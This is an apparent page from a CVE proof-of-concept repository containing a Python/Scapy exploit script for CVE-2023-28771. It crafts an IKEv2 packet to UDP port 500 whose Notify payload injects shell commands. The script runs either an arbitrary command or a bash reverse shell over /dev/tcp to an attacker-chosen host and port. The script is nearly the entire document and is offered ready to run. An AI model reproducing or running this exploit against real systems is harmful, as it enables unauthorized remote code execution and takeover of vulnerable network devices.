4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2023-28771-poc.py PY
#!/usr/bin/python3
import sys
from scapy.all import *
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("rhost")
parser.add_argument("--cmd")
parser.add_argument("--lhost")
parser.add_argument("--lport")
args = parser.parse_args()

load_contrib('ikev2')

if args.cmd is not None:
	cmd = "\";bash -c \"" + args.cmd + "\";echo -n \""
elif args.lhost and args.lport:
	cmd = "\";bash -c \"exec bash -i &>/dev/tcp/" + args.lhost + "/" + args.lport + " <&1;\";echo -n \""
else:
	print("Check your syntax, and try again")
	sys.exit()


packet = IP(dst = args.rhost) / UDP(dport = 500) / IKEv2(init_SPI = RandString(8), next_payload = 'Notify', exch_type = 'IKE_SA_INIT', flags='Initiator') / IKEv2_payload_Notify(next_payload = 'Nonce', type = 14, load = "HAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXB" + cmd) / IKEv2_payload_Nonce(next_payload = 'None', load = RandString(68))

send(packet)